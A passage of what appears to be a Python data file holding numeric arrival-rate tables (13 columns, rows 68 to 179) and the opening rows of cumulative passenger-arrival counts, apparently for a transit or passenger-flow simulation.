(4.14991664579233, 3.8932994557281293, 3.9977623799725652, 4.797456696188943, 4.499951182118938, 2.49995360463344, 2.9454060779318585, 2.943337540009145, 4.6976351394604485, 2.7958481766588665, 3.2481143954161507, 3.697012008759897, 4.0499500600137175), # 68
(4.149256682769726, 3.879698207885305, 3.99319537037037, 4.792113405797101, 4.499564270152505, 2.4995868312757206, 2.9361072725386457, 2.9300395061728395, 4.692719135802469, 2.787522556281772, 3.243945135566188, 3.69088758934373, 4.049554398148149), # 69
(4.147954315023558, 3.865836983937342, 3.9885073731138543, 4.7864348497047775, 4.498799725651577, 2.4988645023624447, 2.926664053824548, 2.916780978509374, 4.687561156835849, 2.779167809785094, 3.239259554610432, 3.6845691045171236, 4.048772933813444), # 70
(4.146027864257172, 3.851724067436612, 3.9837000342935527, 4.7804294015029525, 4.497667231501654, 2.497798323426307, 2.9170806638155953, 2.9035663465935073, 4.6821688843164155, 2.770784143737056, 3.2340749483135447, 3.678061174885086, 4.047615955075446), # 71
(4.143495652173914, 3.8373677419354837, 3.9787749999999997, 4.774105434782609, 4.496176470588235, 2.4964000000000004, 2.907361344537815, 2.8904, 4.676550000000001, 2.7623717647058825, 3.228408612440192, 3.671368421052632, 4.04609375), # 72
(4.140376000477128, 3.8227762909863268, 3.973733916323731, 4.767471323134729, 4.494337125796821, 2.494681237616217, 2.897510338017237, 2.8772863283036125, 4.670712185642433, 2.7539308792597974, 3.2222778427550356, 3.6644954636247675, 4.04421660665295), # 73
(4.136687230870161, 3.807957998141511, 3.968578429355281, 4.760535440150295, 4.49215888001291, 2.4926537418076515, 2.887531886279889, 2.864229721079104, 4.664663122999543, 2.745461693967025, 3.2156999350227427, 3.657446923206507, 4.041994813100138), # 74
(4.13244766505636, 3.7929211469534048, 3.963310185185185, 4.75330615942029, 4.489651416122005, 2.4903292181069965, 2.8774302313518003, 2.8512345679012348, 4.65841049382716, 2.736964415395788, 3.2086921850079744, 3.650227420402859, 4.039438657407408), # 75
(4.127675624739071, 3.77767402097438, 3.957930829903978, 4.745791854535695, 4.486824417009602, 2.4877193720469446, 2.8672096152589983, 2.8383052583447648, 4.651961979881116, 2.7284392501143118, 3.2012718884753966, 3.6428415758188333, 4.036558427640603), # 76
(4.122389431621637, 3.7622249037568043, 3.952442009602194, 4.738000899087493, 4.483687565561204, 2.4848359091601893, 2.8568742800275118, 2.825446181984454, 4.645325262917239, 2.71988640469082, 3.193456341189675, 3.6352940100594426, 4.03336441186557), # 77
(4.1166074074074075, 3.7465820788530473, 3.9468453703703705, 4.729941666666667, 4.48025054466231, 2.481690534979424, 2.84642846768337, 2.812661728395062, 4.638508024691357, 2.7113060856935367, 3.1852628389154707, 3.6275893437296953, 4.029866898148149), # 78
(4.110347873799726, 3.730753829815479, 3.94114255829904, 4.721622530864198, 4.476523037198419, 2.4782949550373417, 2.8358764202526006, 2.7999562871513493, 4.631517946959305, 2.7026984996906855, 3.176708677417449, 3.619732197434602, 4.026076174554183), # 79
(4.103629152501939, 3.714748440196469, 3.9353352194787377, 4.713051865271068, 4.4725147260550315, 2.474660874866636, 2.8252223797612324, 2.7873342478280754, 4.624362711476909, 2.6940638532504906, 3.1678111524602754, 3.611727191779174, 4.02200252914952), # 80
(4.096469565217392, 3.6985741935483873, 3.929425, 4.704238043478262, 4.468235294117647, 2.4708, 2.8144705882352943, 2.7748000000000004, 4.61705, 2.6854023529411766, 3.1585875598086126, 3.603578947368421, 4.01765625), # 81
(4.088887433649431, 3.682239373423603, 3.9234135459533612, 4.695189439076758, 4.463694424271766, 2.466724035970127, 2.8036252877008145, 2.762357933241884, 4.6095874942844075, 2.6767142053309665, 3.1490551952271253, 3.5952920848073546, 4.013047625171469), # 82
(4.080901079501402, 3.6657522633744857, 3.9173025034293554, 4.685914425657542, 4.458901799402889, 2.4624446883097093, 2.7926907201838214, 2.7500124371284866, 4.6019828760859625, 2.6679996169880846, 3.1392313544804775, 3.586871224700985, 4.008186942729767), # 83
(4.072528824476651, 3.649121146953405, 3.9110935185185185, 4.676421376811595, 4.453867102396514, 2.4579736625514403, 2.7816711277103434, 2.7377679012345677, 4.5942438271604935, 2.6592587944807557, 3.1291333333333333, 3.578320987654321, 4.003084490740741), # 84
(4.063788990278524, 3.6323543077127307, 3.904788237311385, 4.666718666129898, 4.448600016138143, 2.4533226642280144, 2.77057075230641, 2.7256287151348886, 4.586378029263831, 2.6504919443772024, 3.1187784275503576, 3.569645994272375, 3.9977505572702334), # 85
(4.054699898610365, 3.6154600292048324, 3.8983883058984916, 4.656814667203436, 4.443110223513274, 2.4485033988721234, 2.7593938359980483, 2.7135992684042067, 4.578393164151807, 2.6416992732456497, 3.108183932896214, 3.5608508651601576, 3.992195430384088), # 86
(4.045279871175523, 3.5984465949820788, 3.8918953703703703, 4.6467177536231885, 4.437407407407409, 2.443527572016461, 2.7481446208112876, 2.701683950617284, 4.570296913580248, 2.632880987654321, 3.097367145135566, 3.551940220922677, 3.9864293981481485), # 87
(4.035547229677343, 3.5813222885968403, 3.8853110768175583, 4.63643629898014, 4.431501250706044, 2.4384068891937205, 2.7368273487721564, 2.68988715134888, 4.562096959304984, 2.6240372941714405, 3.0863453600330795, 3.542918682164946, 3.9804627486282587), # 88
(4.025520295819169, 3.564095393601487, 3.87863707133059, 4.625978676865271, 4.425401436294683, 2.4331530559365953, 2.7254462619066833, 2.678213260173754, 4.553800983081848, 2.615168399365233, 3.0751358733534175, 3.533790869491974, 3.9743057698902606), # 89
(4.015217391304348, 3.546774193548387, 3.871875, 4.615353260869566, 4.419117647058824, 2.427777777777778, 2.7140056022408965, 2.6666666666666665, 4.545416666666667, 2.6062745098039217, 3.0637559808612442, 3.524561403508772, 3.9679687500000003), # 90
(4.004656837836225, 3.529366971989911, 3.8650265089163236, 4.604568424584005, 4.412659565883966, 2.4222927602499618, 2.7025096118008247, 2.6552517604023778, 4.536951691815273, 2.5973558320557304, 3.052222978321224, 3.5152349048203497, 3.961461977023319), # 91
(3.9938569571181493, 3.511882012478429, 3.858093244170096, 4.593632541599571, 4.406036875655611, 2.4167097088858407, 2.690962532612497, 2.6439729309556474, 4.528413740283494, 2.588412572688884, 3.0405541614980214, 3.5058159940317193, 3.954795739026063), # 92
(3.982836070853462, 3.4943275985663087, 3.851076851851852, 4.582553985507247, 4.399259259259259, 2.411040329218107, 2.6793686067019404, 2.632834567901235, 4.519810493827161, 2.579444938271605, 3.0287668261563, 3.496309291747888, 3.9479803240740736), # 93
(3.971612500745512, 3.476712013805921, 3.8439789780521267, 4.571341129898014, 4.392336399580408, 2.4052963267794545, 2.6677320760951844, 2.621841060813901, 4.511149634202104, 2.570453135372119, 3.016878268060724, 3.4867194185738697, 3.9410260202331964), # 94
(3.960204568497644, 3.4590435417496352, 3.8368012688614543, 4.560002348362856, 4.3852779795045596, 2.399489407102576, 2.6560571828182575, 2.6109967992684044, 4.502438843164152, 2.5614373705586484, 3.0049057829759587, 3.477050995114672, 3.933943115569273), # 95
(3.948630595813205, 3.4413304659498216, 3.829545370370371, 4.548546014492754, 4.378093681917211, 2.3936312757201645, 2.6443481688971886, 2.6003061728395065, 4.493685802469136, 2.5523978503994194, 2.992866666666667, 3.4673086419753094, 3.9267418981481486), # 96
(3.936908904395539, 3.4235810699588485, 3.82221292866941, 4.53698050187869, 4.370793189703866, 2.3877336381649137, 2.6326092763580053, 2.5897735711019667, 4.484898193872886, 2.543334781462654, 2.980778214897513, 3.457496979760788, 3.919432656035666), # 97
(3.925057815947994, 3.4058036373290856, 3.814805589849108, 4.525314184111648, 4.363386185750021, 2.3818081999695173, 2.6208447472267373, 2.5794033836305443, 4.476083699131229, 2.534248370316577, 2.9686577234331626, 3.4476206290761193, 3.9120256772976685), # 98
(3.9130956521739133, 3.3880064516129034, 3.8073250000000005, 4.513555434782609, 4.355882352941177, 2.3758666666666666, 2.6090588235294123, 2.5692000000000004, 4.46725, 2.525138823529412, 2.956522488038278, 3.437684210526316, 3.9045312500000002), # 99
(3.901040734776645, 3.3701977963626706, 3.79977280521262, 4.501712627482555, 4.348291374162834, 2.3699207437890566, 2.597255747292058, 2.559167809785094, 4.458404778235026, 2.5160063476693835, 2.944389804477524, 3.427692344716387, 3.896959662208505), # 100
(3.888911385459534, 3.3523859551307584, 3.792150651577504, 4.4897941358024696, 4.340622932300493, 2.3639821368693794, 2.585439760540705, 2.549311202560585, 4.449555715592136, 2.5068511493047154, 2.932276968515565, 3.4176496522513413, 3.8893212019890258), # 101
(3.8767259259259266, 3.3345792114695345, 3.784460185185185, 4.477808333333334, 4.332886710239651, 2.3580625514403297, 2.5736151053013803, 2.539634567901235, 4.440710493827161, 2.4976734350036316, 2.9202012759170657, 3.4075607537361927, 3.881626157407408), # 102
(3.864502677879168, 3.316785848931369, 3.7767030521262, 4.46576359366613, 4.325092390865811, 2.3521736930345987, 2.561786023600112, 2.530142295381802, 4.43187679469593, 2.488473411334356, 2.9081800224466896, 3.397430269775949, 3.873884816529492), # 103
(3.852259963022604, 3.2990141510686315, 3.7688808984910835, 4.453668290391842, 4.317249657064472, 2.3463272671848805, 2.5499567574629305, 2.5208387745770464, 4.4230622999542755, 2.4792512848651125, 2.8962305038691003, 3.3872628209756215, 3.8661074674211253), # 104
(3.840016103059581, 3.2812724014336916, 3.7609953703703702, 4.441530797101449, 4.309368191721133, 2.3405349794238686, 2.5381315489158633, 2.511728395061729, 4.414274691358025, 2.4700072621641254, 2.8843700159489636, 3.3770630279402214, 3.858304398148148), # 105
(3.8277894196934454, 3.2635688835789196, 3.7530481138545952, 4.429359487385937, 4.301457677721294, 2.3348085352842554, 2.526314639984938, 2.5028155464106083, 4.405521650663008, 2.460741549799618, 2.872615854450942, 3.3668355112747577, 3.850485896776406), # 106
(3.8155982346275423, 3.2459118810566845, 3.745040775034294, 4.417162734836285, 4.293527797950456, 2.329159640298735, 2.5145102726961848, 2.494104618198446, 4.396810859625058, 2.4514543543398157, 2.860985315139701, 3.356584891584242, 3.842662251371742), # 107
(3.8034608695652175, 3.2283096774193556, 3.7369750000000006, 4.404948913043479, 4.285588235294117, 2.3236000000000003, 2.5027226890756302, 2.4856000000000003, 4.38815, 2.4421458823529414, 2.8494956937799043, 3.346315789473685, 3.8348437500000006), # 108
(3.7913956462098173, 3.210770556219302, 3.72885243484225, 4.392726395598497, 4.27764867263778, 2.318141319920744, 2.490956131149305, 2.4773060813900325, 4.379546753543667, 2.432816340407219, 2.838164286136216, 3.336032825548095, 3.8270406807270234), # 109
(3.7794208862646865, 3.193302801008895, 3.7206747256515786, 4.380503556092324, 4.269718792866942, 2.3127953055936596, 2.4792148409432357, 2.4692272519433014, 4.371008802011889, 2.4234659350708734, 2.8270083879733003, 3.3257406204124855, 3.819263331618656), # 110
(3.7675549114331726, 3.175914695340502, 3.712443518518519, 4.368288768115942, 4.261808278867103, 2.3075736625514405, 2.4675030604834527, 2.461367901234568, 4.362543827160494, 2.414094872912128, 2.8160452950558215, 3.3154437946718653, 3.811521990740741), # 111
(3.75581604341862, 3.1586145227664937, 3.7041604595336084, 4.356090405260333, 4.253926813523764, 2.3024880963267798, 2.4558250317959835, 2.453732418838592, 4.354159510745313, 2.4047033604992065, 2.805292303148444, 3.3051469689312443, 3.803826946159122), # 112
(3.744201689481218, 3.141439447514381, 3.6958471313008276, 4.343933552996816, 4.246070272069482, 2.2975479076858054, 2.444210385462708, 2.4463410275122426, 4.345885124503448, 2.395321894645092, 2.7947695624611466, 3.2948771746017713, 3.7961775603372887), # 113
(3.732592359160026, 3.1245588734102143, 3.6876182700086475, 4.331915768510934, 4.238157341826531, 2.2927418434119606, 2.432807283364232, 2.439284503802048, 4.3378476142852245, 2.386126067165113, 2.784497734845279, 3.28476486884519, 3.788510165664014), # 114
(3.720953961201598, 3.107978879473219, 3.679478773082927, 4.320033802072712, 4.230163071155441, 2.2880574049995057, 2.421623860076625, 2.4325610617114837, 4.330049991467516, 2.377130131195231, 2.7744618045708376, 3.2748150330235406, 3.7808026526641507), # 115
(3.709271949295054, 3.091675312516681, 3.6714128759935494, 4.3082664601065614, 4.222075410553511, 2.283483550914839, 2.4106419270111576, 2.4261521251595974, 4.322472535691133, 2.368317343379819, 2.7646423725085927, 3.2650092789949383, 3.7730429039023563), # 116
(3.697531777129509, 3.0756240193538886, 3.6634048142103945, 4.296592549036897, 4.213882310518044, 2.279009239624356, 2.399843295579101, 2.420039118065434, 4.315095526596881, 2.3596709603632515, 2.755020039529313, 3.2553292186175002, 3.76521880194329), # 117
(3.6857188983940845, 3.0598008467981295, 3.655438823203347, 4.284990875288133, 4.205571721546337, 2.2746234295944556, 2.3892097771917262, 2.414203464348039, 4.307899243825574, 2.3511742387899037, 2.74557540650377, 3.24575646374934, 3.75731822935161), # 118
(3.673818766777897, 3.044181641662692, 3.6474991384422895, 4.273440245284682, 4.197131594135689, 2.270315079291533, 2.3787231832603024, 2.408626587926458, 4.300863967018017, 2.342810435304149, 2.7362890743027313, 3.236272626248574, 3.749329068691973), # 119
(3.6618168359700647, 3.0287422507608635, 3.639569995397105, 4.261919465450958, 4.188549878783399, 2.266073147181986, 2.3683653251961014, 2.403289912719737, 4.293969975815023, 2.334562806550362, 2.7271416437969664, 3.226859317973319, 3.741239202529039), # 120
(3.6496985596597074, 3.0134585209059317, 3.631635629537675, 4.250407342211374, 4.179814525986767, 2.261886591732212, 2.358118014410392, 2.398174862646923, 4.2871975498573995, 2.3264146091729185, 2.7181137158572466, 3.217498150781689, 3.7330365134274643), # 121
(3.6374493915359416, 2.9983062989111846, 3.6236802763338845, 4.238882681990343, 4.170913486243093, 2.2577443714086076, 2.347963062314447, 2.3932628616270595, 4.2805269687859555, 2.318349099816191, 2.7091858913543407, 3.2081707365318004, 3.7247088839519082), # 122
(3.6250547852878876, 2.9832614315899098, 3.6156881712556146, 4.227324291212278, 4.161834710049677, 2.25363544467757, 2.3378822803195356, 2.3885353335791932, 4.273938512241502, 2.310349535124555, 2.700338771159018, 3.198858687081769, 3.716244196667029), # 123
(3.612500194604662, 2.968299765755395, 3.607643549772748, 4.215710976301595, 4.152566147903815, 2.2495487700054957, 2.327857479836928, 2.3839737024223706, 4.267412459864846, 2.3023991717423846, 2.691552956142048, 3.1895436142897102, 3.7076303341374848), # 124
(3.5997710731753836, 2.9533971482209282, 3.5995306473551696, 4.204021543682704, 4.143095750302809, 2.2454733058587824, 2.3178704722778956, 2.3795593920756364, 4.260929091296798, 2.2944812663140537, 2.6828090471742008, 3.1802071300137396, 3.6988551789279316), # 125
(3.5868528746891712, 2.938529425799798, 3.5913336994727594, 4.192234799780022, 4.133411467743957, 2.241398010703827, 2.307903069053708, 2.375273826458037, 4.254468686178167, 2.286579075483937, 2.6740876451262454, 3.170830846111974, 3.6899066136030316), # 126
(3.5737310528351447, 2.92367244530529, 3.583036941595402, 4.18032955101796, 4.123501250724559, 2.237311843007026, 2.2979370815756375, 2.3710984294886184, 4.248011524149763, 2.2786758558964095, 2.6653693508689518, 3.1613963744425266, 3.6807725207274395), # 127
(3.5603910613024183, 2.908802053550694, 3.57462460919298, 4.168284603820933, 4.113353049741916, 2.2332037612347775, 2.287954321254953, 2.367014625086425, 4.241537884852394, 2.2707548641958453, 2.6566347652730897, 3.1518853268635154, 3.671440782865815), # 128
(3.546818353780113, 2.8938940973492966, 3.566080937735376, 4.156078764613353, 4.102954815293325, 2.229062723853478, 2.2779365995029255, 2.363003837170504, 4.23502804792687, 2.2627993570266183, 2.6478644892094287, 3.1422793152330546, 3.6618992825828154), # 129
(3.532998383957347, 2.8789244235143867, 3.5573901626924718, 4.143690839819635, 4.092294497876085, 2.2248776893295235, 2.267865727730825, 2.3590474896599, 4.228462293014, 2.254792591033103, 2.639039123548738, 3.1325599514092612, 3.6521359024430993), # 130
(3.5189166055232377, 2.863868878859251, 3.5485365195341525, 4.1310996358641905, 4.081360047987498, 2.2206376161293124, 2.2577235173499237, 2.35512700647366, 4.2218208997545945, 2.246717822859674, 2.6301392691617873, 3.1227088472502498, 3.6421385250113247), # 131
(3.504558472166904, 2.8487033101971777, 3.5395042437302986, 4.118283959171435, 4.070139416124862, 2.216331462719241, 2.24749177977149, 2.3512238115308293, 4.215084147789462, 2.2385583091507057, 2.6211455269193458, 3.112707614614137, 3.6318950328521504), # 132
(3.4899094375774653, 2.833403564341454, 3.5302775707507936, 4.105222616165781, 4.058620552785475, 2.2119481875657065, 2.237152326406796, 2.347319328750453, 4.2082323167594105, 2.230297306550573, 2.6120384976921844, 3.102537865359037, 3.6213933085302346), # 133
(3.474954955444038, 2.8179454881053694, 3.5208407360655216, 4.091894413271642, 4.046791408466637, 2.207476749135106, 2.2266869686671114, 2.3433949820515774, 4.201245686305252, 2.2219180717036493, 2.6027987823510714, 3.0921812113430667, 3.6106212346102335), # 134
(3.4596804794557414, 2.8023049283022097, 3.5111779751443635, 4.078278156913432, 4.034639933665648, 2.202906105893837, 2.2160775179637073, 2.339432195353248, 4.194104536067792, 2.2134038612543105, 2.593406981766777, 3.081619264424341, 3.599566693656808), # 135
(3.444071463301694, 2.786457731745264, 3.5012735234572037, 4.064352653515562, 4.022154078879807, 2.198225216308296, 2.205305785707854, 2.335412392574511, 4.186789145687842, 2.204737931846929, 2.583843696810071, 3.0708336364609767, 3.5882175682346147), # 136
(3.4281133606710137, 2.770379745247819, 3.4911116164739244, 4.0500967095024505, 4.0093217946064135, 2.1934230388448794, 2.1943535833108223, 2.3313169976344117, 4.179279794806213, 2.195903540125881, 2.5740895283517222, 3.059805939311088, 3.5765617409083106), # 137
(3.4117916252528193, 2.7540468156231634, 3.480676489664407, 4.0354891312985055, 3.9961310313427676, 2.1884885319699854, 2.1832027221838817, 2.327127434451996, 4.1715567630637125, 2.186883942735539, 2.564125077262501, 3.048517784832791, 3.5645870942425564), # 138
(3.3950917107362275, 2.7374347896845848, 3.469952378498536, 4.020508725328144, 3.9825697395861663, 2.1834106541500105, 2.171835013738304, 2.32282512694631, 4.163600330101149, 2.177662396320279, 2.5539309444131764, 3.0369507848842026, 3.5522815108020076), # 139
(3.3779990708103593, 2.72051951424537, 3.458923518446195, 4.005134298015778, 3.968625869833912, 2.1781783638513517, 2.1602322693853586, 2.3183914990363985, 4.155390775559333, 2.1682221575244744, 2.5434877306745176, 3.0250865513234366, 3.539632873151326), # 140
(3.3604991591643323, 2.7032768361188086, 3.4475741449772643, 3.989344655785821, 3.9542873725833014, 2.172780619540406, 2.148376300536318, 2.3138079746413083, 4.146908379079072, 2.1585464829925005, 2.5327760369172956, 3.01290669600861, 3.5266290638551654), # 141
(3.3425774294872626, 2.6856826021181863, 3.4358884935616283, 3.9731186050626883, 3.939542198331635, 2.167206379683571, 2.1362489186024507, 2.3090559776800847, 4.138133420301177, 2.1486186293687313, 2.521776464012279, 3.000392830797838, 3.5132579654781866), # 142
(3.32421933546827, 2.6677126590567926, 3.4238507996691703, 3.95643495227079, 3.9243782975762116, 2.1614446027472427, 2.1238319349950276, 2.3041169320717727, 4.129046178866459, 2.138421853297541, 2.5104696128302373, 2.987526567549236, 3.499507460585047), # 143
(3.305410330796474, 2.6493428537479145, 3.411445298769771, 3.939272503834543, 3.9087836208143316, 2.1554842471978186, 2.1111071611253194, 2.2989722617354196, 4.119626934415724, 2.127939411423304, 2.4988360842419404, 2.9742895181209197, 3.485365431740406), # 144
(3.286135869160991, 2.63054903300484, 3.3986562263333155, 3.921610066178358, 3.892746118543293, 2.149314271501696, 2.0980564084045974, 2.2936033905900706, 4.109855966589782, 2.117154560390395, 2.486856479118158, 2.9606632943710056, 3.47081976150892), # 145
(3.2663814042509403, 2.6113070436408568, 3.385467817829687, 3.9034264457266503, 3.8762537412603972, 2.1429236341252724, 2.084661488244132, 2.287991742554771, 4.099713555029442, 2.106050556843188, 2.4745113983296596, 2.946629508157608, 3.4558583324552474), # 146
(3.24613238975544, 2.5915927324692523, 3.371864308728764, 3.884700448903832, 3.859294439462941, 2.136301293534943, 2.0709042120551926, 2.282118741548566, 4.089179979375516, 2.0946106574260583, 2.4617814427472147, 2.9321697713388444, 3.4404690271440472), # 147
(3.2253742793636087, 2.5713819463033154, 3.357829934500433, 3.8654108821343187, 3.8418561636482247, 2.129436208197107, 2.0567663912490506, 2.275965811490503, 4.078235519268811, 2.0828181187833787, 2.448647213241593, 2.9172656957728282, 3.4246397281399767), # 148
(3.204092526764565, 2.5506505319563324, 3.3433489306145776, 3.845536551842521, 3.8239268643135484, 2.12231733657816, 2.0422298372369765, 2.2695143762996266, 4.066860454350135, 2.0706561975595252, 2.435089310683564, 2.901898893317677, 3.408358318007695), # 149
(3.182272585647426, 2.5293743362415917, 3.328405532541078, 3.825056264452855, 3.8054944919562104, 2.1149336371444996, 2.0272763614302405, 2.2627458598949826, 4.055035064260301, 2.0581081503988705, 2.4210883359438973, 2.8860509758315054, 3.3916126793118586), # 150
(3.15989990970131, 2.5075292059723817, 3.312983975749817, 3.803948826389732, 3.786546997073511, 2.107274068362522, 2.011887775240113, 2.2556416861956174, 4.042739628640116, 2.0451572339457913, 2.406624889893362, 2.869703555172429, 3.3743906946171274), # 151
(3.1369599526153373, 2.485090987961989, 3.297068495710681, 3.7821930440775677, 3.7670723301627476, 2.0993275886986256, 1.996045890077866, 2.2481832791205765, 4.029954427130388, 2.03178670484466, 2.3916795734027287, 2.8528382431985637, 3.356680246488159), # 152
(3.1134381680786243, 2.462035529023703, 3.2806433278935474, 3.759767723940773, 3.7470584417212223, 2.0910831566192063, 1.9797325173547677, 2.240352062588905, 4.01665973937193, 2.0179798197398515, 2.3762329873427666, 2.835436651768026, 3.338469217489611), # 153
(3.0893200097802915, 2.43833867597081, 3.2636927077683033, 3.736651672403764, 3.726493282246232, 2.082529730590662, 1.9629294684820913, 2.232129460519649, 4.002835845005547, 2.0037198352757413, 2.360265732584245, 2.81748039273893, 3.319745490186143), # 154
(3.0645909314094544, 2.413976275616598, 3.2462008708048304, 3.7128236958909513, 3.7053648022350787, 2.0736562690793887, 1.9456185548711045, 2.2234968968318545, 3.9884630236720513, 1.9889900080967018, 2.343758409997933, 2.798951077969393, 3.3004969471424106), # 155
(3.0392363866552325, 2.3889241747743553, 3.2281520524730105, 3.68826260082675, 3.6836609521850594, 2.0644517305517844, 1.92778158793308, 2.2144357954445675, 3.9735215550122507, 1.9737735948471091, 2.3266916204546018, 2.7798303193175293, 3.280711470923074), # 156
(3.013241829206745, 2.3631582202573695, 3.209530488242727, 3.662947193635575, 3.661369682593474, 2.0549050734742456, 1.9094003790792877, 2.204927580276833, 3.9579917186669555, 1.9580538521713367, 2.3090459648250197, 2.760099728641455, 3.2603769440927906), # 157
(2.985872378562096, 2.3361812483089035, 3.1894367815609423, 3.6359078326604974, 3.637472442348399, 2.044409790526844, 1.890042688371143, 2.194318780939749, 3.9406648366396393, 1.9413463665164574, 2.290238301015577, 2.739039825677736, 3.238594343766138), # 158
(2.9529147067913613, 2.305226127839791, 3.162695127361195, 3.6015908635153817, 3.6060765239126513, 2.0294758592028415, 1.8672851053542865, 2.178885413105753, 3.914570904488858, 1.9209123976394982, 2.2669667742475976, 2.7125450094732435, 3.210171058768078), # 159
(2.913948837961724, 2.2700386914162856, 3.1287683831823556, 3.559431004163544, 3.5665680525387184, 2.0097365184190736, 1.8408974993535137, 2.158239675810939, 3.8789700908914604, 1.8964822607451575, 2.238903803443816, 2.680200779555139, 3.1745682435574323), # 160
(2.869288821834384, 2.2308483472321874, 3.0880187887641237, 3.509829001502691, 3.5193572497128454, 1.9854308966281256, 1.8110725784027506, 2.132640213243912, 3.834331906799607, 1.8682632772683752, 2.206296661839883, 2.6423069875630283, 3.132149617927639), # 161
(2.8192487081705426, 2.1878845034812957, 3.0408085838461982, 3.4531856024305307, 3.464854336921282, 1.9567981222825823, 1.7780030505359237, 2.102345669593281, 3.781125863165455, 1.8364627686440926, 2.1693926226714484, 2.5991634851365175, 3.0832789016721334), # 162
(2.7641425467313994, 2.1413765683574097, 2.987500008168281, 3.3899015538447737, 3.4034695356502755, 1.924077323835029, 1.7418816237869603, 2.06761468904765, 3.7198214709411626, 1.80128805630725, 2.1284389591741633, 2.5510701239152134, 3.0283198145843517), # 163
(2.704284387278154, 2.0915539500543283, 2.9284553014700707, 3.320377602643127, 3.3356130673860758, 1.8875076297380518, 1.7029010061897865, 2.0287059157956278, 3.6508882410788894, 1.7629464616927875, 2.0836829445836784, 2.4983267555387214, 2.9676360764577314), # 164
(2.639988279572007, 2.038646056765853, 2.8640367034912675, 3.245014495723301, 3.2616951536149297, 1.8473281684442346, 1.6612539057783289, 1.9858779940258184, 3.574795684530792, 1.7216453062356454, 2.0353718521356448, 2.441233231646648, 2.901591407085708), # 165
(2.571568273374159, 1.9828822966857818, 2.7946064539715714, 3.1642129799830006, 3.1821260158230857, 1.8037780684061635, 1.6171330305865146, 1.939389567926831, 3.4920133122490293, 1.677591911370765, 1.9837529550657118, 2.3800894038786007, 2.830549526261718), # 166
(2.4993384184458094, 1.9244920780079149, 2.720526792650682, 3.0783738023199376, 3.097315875496792, 1.7570964580764235, 1.57073108864827, 1.8894992816872707, 3.40301063518576, 1.6309935985330857, 1.929073526609531, 2.3151951238741835, 2.7548741537791983), # 167
(2.4236127645481584, 1.8637048089260515, 2.6421599592682994, 2.9878977096318184, 3.007674954122297, 1.7075224659075996, 1.5222407879975217, 1.836465779495744, 3.308257164293142, 1.5820576891575489, 1.8715808400027525, 2.2468502432730046, 2.674929009431585), # 168
(2.344705361442406, 1.8007498976339917, 2.5598681935641237, 2.8931854488163533, 2.913613473185848, 1.655295220352278, 1.4718548366681967, 1.780547705540858, 3.2082224105233355, 1.5309915046790947, 1.8115221684810274, 2.175354613714669, 2.591077813012314), # 169
(2.2629302588897535, 1.735856752325535, 2.474013735277854, 2.794637766771248, 2.8155416541736935, 1.6006538498630427, 1.4197659426942213, 1.722003704011219, 3.1033758848284956, 1.4780023665326631, 1.7491447852800066, 2.1010080868387835, 2.503684284314822), # 170
(2.1786015066514, 1.6692547811944802, 2.3849588241491912, 2.6926554103942144, 2.7138697185720826, 1.5438374828924795, 1.3661668141095222, 1.6610924190954333, 2.9941870981607828, 1.4232975961531955, 1.6846959636353394, 2.0241105142849545, 2.413112143132546), # 171
(2.092033154488546, 1.6011733924346279, 2.2930656999178347, 2.5876391265829586, 2.6090078878672616, 1.4850852478931735, 1.3112501589480263, 1.5980724949821083, 2.8811255614723543, 1.367084514975632, 1.6184229767826777, 1.9449617476927885, 2.3197251092589215), # 172
(2.003539252162392, 1.531841994239777, 2.198696602323485, 2.4799896622351905, 2.5013663835454807, 1.42463627331771, 1.25520868524366, 1.5332025758598495, 2.7646607857153693, 1.3095704444349128, 1.5505730979576713, 1.86386163870189, 2.223886902487385), # 173
(1.9134338494341376, 1.4614899948037272, 2.102213771105841, 2.3701077642486164, 2.3913554270929867, 1.362729687618674, 1.1982351010303502, 1.4667413059172643, 2.6452622818419855, 1.2509627059659787, 1.4813936003959711, 1.7811100389518673, 2.1259612426113734), # 174
(1.8220309960649823, 1.3903468023202779, 2.003979446004603, 2.258394179520947, 2.2793852399960275, 1.2996046192486514, 1.1405221143420232, 1.3989473293429584, 2.5233995608043625, 1.1914686210037697, 1.4111317573332278, 1.6970068000823257, 2.026311849424323), # 175
(1.7296447418161276, 1.3186418249832292, 1.9043558667594713, 2.14524965494989, 2.165866043740852, 1.2355001966602268, 1.082262433212606, 1.3300792903255396, 2.399542133554657, 1.1312955109832268, 1.340034842005092, 1.6118517737328717, 1.9253024427196697), # 176
(1.636589136448773, 1.2466044709863806, 1.8037052731101455, 2.031074937433153, 2.0512080598137095, 1.1706555483059853, 1.0236487656760251, 1.2603958330536131, 2.274159511045028, 1.0706506973392897, 1.2683501276472144, 1.5259448115431116, 1.82329674229085), # 177
(1.5431782297241188, 1.1744641485235314, 1.7023899047963256, 1.9162707738684466, 1.9358215097008455, 1.105309802638513, 0.964873819766207, 1.1901556017157862, 2.147721204227634, 1.0097415015069, 1.196324887495245, 1.439585765152651, 1.7206584679313008), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_arriving_acc = (
(0, 3, 4, 1, 1, 1, 0, 1, 5, 0, 0, 1, 0, 1, 5, 2, 3, 3, 1, 2, 1, 1, 1, 0, 0, 0), # 0
(3, 6, 6, 4, 1, 1, 0, 2, 6, 1, 0, 1, 0, 4, 8, 3, 3, 3, 4, 2, 1, 1, 1, 0, 0, 0), # 1
(5, 9, 10, 7, 4, 1, 2, 2, 7, 1, 0, 1, 0, 6, 11, 5, 3, 5, 5, 2, 4, 1, 2, 0, 1, 0), # 2
(7, 10, 10, 7, 4, 1, 3, 2, 7, 2, 0, 1, 0, 6, 12, 5, 5, 6, 5, 2, 4, 3, 3, 0, 1, 0), # 3
(8, 13, 10, 10, 6, 1, 3, 4, 8, 2, 0, 2, 0, 6, 15, 5, 7, 7, 8, 2, 5, 4, 6, 0, 1, 0), # 4
(12, 13, 11, 13, 9, 1, 4, 6, 11, 2, 1, 2, 0, 7, 19, 7, 12, 8, 9, 2, 6, 5, 7, 0, 1, 0), # 5
(16, 16, 11, 13, 11, 1, 4, 6, 13, 2, 1, 2, 0, 10, 21, 9, 14, 12, 9, 8, 6, 5, 8, 0, 2, 0), # 6
(18, 20, 15, 14, 13, 3, 4, 6, 14, 3, 2, 2, 0, 14, 21, 10, 15, 16, 10, 10, 6, 7, 9, 2, 2, 0), # 7
(20, 24, 19, 14, 13, 3, 4, 6, 15, 5, 3, 2, 0, 17, 25, 12, 15, 19, 11, 10, 6, 8, 12, 2, 2, 0), # 8
